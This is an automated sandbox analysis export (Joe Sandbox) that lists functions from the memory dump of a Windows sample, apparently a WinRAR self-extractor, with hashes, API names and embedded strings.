                                  • Opcode Fuzzy Hash: be7ed4402fc1a38c1953c688923f2ad906cda00ccdf3b5d5fa14c8939cdf2fd3
                                  • Instruction Fuzzy Hash: 34B09220E07A06CBEA093F117CC621DA2A87F48B20FD48078C40C81360DF6C32A58F60
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cd28e31d7d5d8dacbc8c1e36a10d9298773be20ef7319678f464fee92af96a22
                                  • Instruction ID: a413eb423f97b2570f9bc86399415dedb256be0e1900c641679921a6e167c6d6
                                  • Opcode Fuzzy Hash: cd28e31d7d5d8dacbc8c1e36a10d9298773be20ef7319678f464fee92af96a22
                                  • Instruction Fuzzy Hash: 7F220673B206508BD728CF25D89AE5E7766F798744B4B8228DF0ACB785DB38D605CB40
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c6c4f15c2075db455a8805df7f1b959bd99bc7369c78054583d6a965d91bd105
                                  • Instruction ID: 99414c8697c674a02edb6e476fce049996fef9c0a37a05ccea2427e31c0f630a
                                  • Opcode Fuzzy Hash: c6c4f15c2075db455a8805df7f1b959bd99bc7369c78054583d6a965d91bd105
                                  • Instruction Fuzzy Hash: BFD18C72A181D14EE312CB79A0544BEBFB5E31D34DB8A8251DFD59374AC62EE202DB60
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9782f85efb0ae2e1c0b67e86eaa04f67255253bd9529923cb00556c4c2cc06da
                                  • Instruction ID: c3ccb1c0176495a496265a1e9ef1484e3c35a1b31a4b0c4d26e09614fae590f6
                                  • Opcode Fuzzy Hash: 9782f85efb0ae2e1c0b67e86eaa04f67255253bd9529923cb00556c4c2cc06da
                                  • Instruction Fuzzy Hash: 40612722B181D14AEB11DF7595804FDFFA1A709B947864132CE9A9374ADB3CF305CBA1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
                                  • Instruction ID: 8004bc7538211a4a0eb84e9669d5e1a76f1e28c98ddffac22244f40feecc4a2f
                                  • Opcode Fuzzy Hash: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
                                  • Instruction Fuzzy Hash: 30F06D61A6C60243FE1C2828644973DD2429B90B24F92863DD00AC63C1DB9CBB81A3E6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 915a11522949b389e451a5ed0c02c5f26bdaa58b853bb1385cc96cba591218a7
                                  • Instruction ID: 60f44e668c0d1d5ca8870f4973b1a882d546be7bbbe892041200d07ba6a2bbb1
                                  • Opcode Fuzzy Hash: 915a11522949b389e451a5ed0c02c5f26bdaa58b853bb1385cc96cba591218a7
                                  • Instruction Fuzzy Hash: 4AA00165A08912D2E648AF00B8A4528E264BB54B20BC00031D81DC16A29F6CB55086A0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                  • API String ID: 2565136772-3242537097
                                  • Opcode ID: 029695a6267facf631d40e22352065ea960f1d0c33bf652913798791beb6e733
                                  • Instruction ID: 4fda4cc8589a15696706c3df19d407fe85d93a83a62e0f0ce394984905d16408
                                  • Opcode Fuzzy Hash: 029695a6267facf631d40e22352065ea960f1d0c33bf652913798791beb6e733
                                  • Instruction Fuzzy Hash: A7212E60E1A60783FE15BF10F89567EE2A4BF54F60FC40035D91E82BA0EF6CB55587A0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                  • String ID: GETPASSWORD1$Software\WinRAR SFX
                                  • API String ID: 431506467-1315819833
                                  • Opcode ID: a5c1420563de154322e58b961742644a218078f87695e0f8e231236245ab560e
                                  • Instruction ID: 8c44bd18a2eccf90f54132f04968c92978696e030d8a176ae3ff9220594d1870
                                  • Opcode Fuzzy Hash: a5c1420563de154322e58b961742644a218078f87695e0f8e231236245ab560e
                                  • Instruction Fuzzy Hash: E8B19362F1974286FB00AF64E4442ACE3A2AB45BB4F804235DE5CA7B99DF3CF555C390
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo
                                  • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                  • API String ID: 3215553584-2617248754
                                  • Opcode ID: 7e5ce1446c841e33a66cfbd311af876c7b34449f0d6954941b6492f47989c701
                                  • Instruction ID: bf37becce00d0f215e83d6a08679a6ecc71a317d8e244c1c68e313344a9627e7
                                  • Opcode Fuzzy Hash: 7e5ce1446c841e33a66cfbd311af876c7b34449f0d6954941b6492f47989c701
                                  • Instruction Fuzzy Hash: D8416976A09B558AE704DF25E8417ADB7E4EB04BA8F81413AEE5C87B54DF38E025C390
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Window$ButtonCheckedObject$ClassDeleteLongName
                                  • String ID: STATIC
                                  • API String ID: 781704138-1882779555
                                  • Opcode ID: a56abbe028ef3f0b7d15def6da20f662c50af87d749574eaec9b76d17f79dad6
                                  • Instruction ID: 5c5d781a899bb6323bcccf3830619602f435945b6fb3b11ebb57797d309f1126
                                  • Opcode Fuzzy Hash: a56abbe028ef3f0b7d15def6da20f662c50af87d749574eaec9b76d17f79dad6
                                  • Instruction Fuzzy Hash: A1318F25A1965287EA20AF11B9147BDE3A2AB89FA0F840030DE4D87B55DF3CF50686A0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                  • String ID: UNC$\\?\
                                  • API String ID: 4097890229-253988292
                                  • Opcode ID: 627c07d53eccfe150ff9c499ac3b11f54613392915993c7d05f5251deab33fae
                                  • Instruction ID: 36535165ff2c8bd19ff937205e1f05b5f20320a3e1a6c015a8ba9e24c43c2c35
                                  • Opcode Fuzzy Hash: 627c07d53eccfe150ff9c499ac3b11f54613392915993c7d05f5251deab33fae
                                  • Instruction Fuzzy Hash: 8412C122B18B4286EB10EF64E0441ADE371EB41FA8F914231DA5D97BD9DF3CE645C3A1
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo_noreturn$AllocGlobal
                                  • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                  • API String ID: 2721297748-1533471033
                                  • Opcode ID: f0895581c817e55a58f121f9c0f6f66dd55f3ddbc4a2fb8a2d625ca181ef1552
                                  • Instruction ID: 09b72424fdd7b1626978742b06a4934862e3b3d26a5a1ac195f44bcba60f2906
                                  • Opcode Fuzzy Hash: f0895581c817e55a58f121f9c0f6f66dd55f3ddbc4a2fb8a2d625ca181ef1552
                                  • Instruction Fuzzy Hash: FB815F62B1864186FB00FFA5E4401EDE3B2AB44BA8FC04135DE1D96795EF38E51AC3E4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Item$Text
                                  • String ID: LICENSEDLG
                                  • API String ID: 1601838975-2177901306
                                  • Opcode ID: 413809c6c529f907a05a51e37b96b30026af9f7a13d4bd8aebdb5ec3f6628f42
                                  • Instruction ID: 53001120321061ac8093e0eb73685527aa498cc6d08acbaad7e5ce4eac2b42a4
                                  • Opcode Fuzzy Hash: 413809c6c529f907a05a51e37b96b30026af9f7a13d4bd8aebdb5ec3f6628f42
                                  • Instruction Fuzzy Hash: 22415E25A1865283FB14AF51F84877CE2A1AF85FA0F844135DE0E87BA5CF7CF64583A0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$CurrentDirectoryProcessSystem
                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                  • API String ID: 2915667086-2207617598
                                  • Opcode ID: df634e7e6220f0fab9136f3d9598b6958fd483239d44fb29bf155b66aa12a787
                                  • Instruction ID: 608da29695ae899fa60fd030e232642212af4d76cd26aec5123c923d5d0db597
                                  • Opcode Fuzzy Hash: df634e7e6220f0fab9136f3d9598b6958fd483239d44fb29bf155b66aa12a787
                                  • Instruction Fuzzy Hash: 5E316D60A09B5287EA05AF11B9900BDE3A0AF44FB4BC50235DD5E83BA4DF7CF241C7A1
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo_noreturn
                                  • String ID: $
                                  • API String ID: 3668304517-227171996
                                  • Opcode ID: c8965c4f87891568c389f61817c83666d92bf9a7bc58ebf4ca93cead553343d7
                                  • Instruction ID: 6bcf243bea37bd0dfd48bd1f90351755e5d8a942589f0a86c667068d2b559ecc
                                  • Opcode Fuzzy Hash: c8965c4f87891568c389f61817c83666d92bf9a7bc58ebf4ca93cead553343d7
                                  • Instruction Fuzzy Hash: 6CF1AE62F1874682EE00AF65E4441BCE362AB44FB8F905631CA9D977D9DF7CF59083A0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                  • String ID: csm$csm$csm
                                  • API String ID: 2940173790-393685449
                                  • Opcode ID: 7ce8224d02cbc9d10e697210102f736983d510ff4da2607681883173542701a8
                                  • Instruction ID: c7118128268b7342fb8853dcead291f82721890cdef3dc2f8b86c2bd68524077
                                  • Opcode Fuzzy Hash: 7ce8224d02cbc9d10e697210102f736983d510ff4da2607681883173542701a8
                                  • Instruction Fuzzy Hash: ACE192729086828BE710AF74E4803BDF7A0EB44B68F944136DA8D97796DF38F591C790
                                  APIs
                                    • Part of subcall function 00007FF7C0190AA0: CompareStringW.KERNEL32(?,?,00007FF7C0186C19), ref: 00007FF7C0190ABF
                                    • Part of subcall function 00007FF7C01812BC: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7C01813B6
                                    • Part of subcall function 00007FF7C0190AD0: CompareStringW.KERNEL32 ref: 00007FF7C0190B36
                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0191DC2
                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0191DC8
                                  • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7C0191E25
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CompareString_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskswprintf
                                  • String ID: .zipx$.zx$z%s%02d
                                  • API String ID: 2859674139-515631857
                                  • Opcode ID: 4b60fe0a4260c981502afa51fbfce4c695209fcfdf906febb7fa7c3ab58db49e
                                  • Instruction ID: 9aed520397035556e8e57a5d6c4ecb383ffdbcc5d0711f78492f57babadb548a
                                  • Opcode Fuzzy Hash: 4b60fe0a4260c981502afa51fbfce4c695209fcfdf906febb7fa7c3ab58db49e
                                  • Instruction Fuzzy Hash: 0B719362A147419AEB10EF64E4912EDF361FB44BA4F805231EA5C86B99DF38E255C390
                                  APIs
                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7C01AAA83,?,?,?,00007FF7C01A87EE,?,?,?,00007FF7C01A87A9), ref: 00007FF7C01AA901
                                  • GetLastError.KERNEL32(?,?,00000000,00007FF7C01AAA83,?,?,?,00007FF7C01A87EE,?,?,?,00007FF7C01A87A9), ref: 00007FF7C01AA90F
                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7C01AAA83,?,?,?,00007FF7C01A87EE,?,?,?,00007FF7C01A87A9), ref: 00007FF7C01AA939
                                  • FreeLibrary.KERNEL32(?,?,00000000,00007FF7C01AAA83,?,?,?,00007FF7C01A87EE,?,?,?,00007FF7C01A87A9), ref: 00007FF7C01AA97F
                                  • GetProcAddress.KERNEL32(?,?,00000000,00007FF7C01AAA83,?,?,?,00007FF7C01A87EE,?,?,?,00007FF7C01A87A9), ref: 00007FF7C01AA98B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                  • String ID: api-ms-
                                  • API String ID: 2559590344-2084034818
                                  • Opcode ID: 6c79a96e063dba16a1b32c7952d051ebac3d8e1187371194647d3fb8a0e2c012
                                  • Instruction ID: 6a1caaba2edad35aecad5e616d67413b906c588064dc277c64966b24d58d29b5
                                  • Opcode Fuzzy Hash: 6c79a96e063dba16a1b32c7952d051ebac3d8e1187371194647d3fb8a0e2c012
                                  • Instruction Fuzzy Hash: 1F319C61A1A64296EE12AF02B80067AF3D4BF48FB8FDA0535DD1D86791DF3CF05587A0
                                  APIs
                                  • GetModuleHandleW.KERNEL32(?,?,?,00007FF7C01A5003,?,?,?,00007FF7C01A53BA), ref: 00007FF7C01A50BB
                                  • GetProcAddress.KERNEL32(?,?,?,00007FF7C01A5003,?,?,?,00007FF7C01A53BA), ref: 00007FF7C01A50D8
                                  • GetProcAddress.KERNEL32(?,?,?,00007FF7C01A5003,?,?,?,00007FF7C01A53BA), ref: 00007FF7C01A50F4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$HandleModule
                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                  • API String ID: 667068680-1718035505
                                  • Opcode ID: d44736b24ca49afb9e39255391aa9d684b927709e013dababe23d1481c6dad27
                                  • Instruction ID: bcc10c21aae9d4242972a668f3436e9411a60349ace74b3c9eb3dd14552a9a4c
                                  • Opcode Fuzzy Hash: d44736b24ca49afb9e39255391aa9d684b927709e013dababe23d1481c6dad27
                                  • Instruction Fuzzy Hash: 11112AA0A1DB0383EE55AF10B98027CE291AF49FB4FC91434C81D86B50EF7CB4A486F0
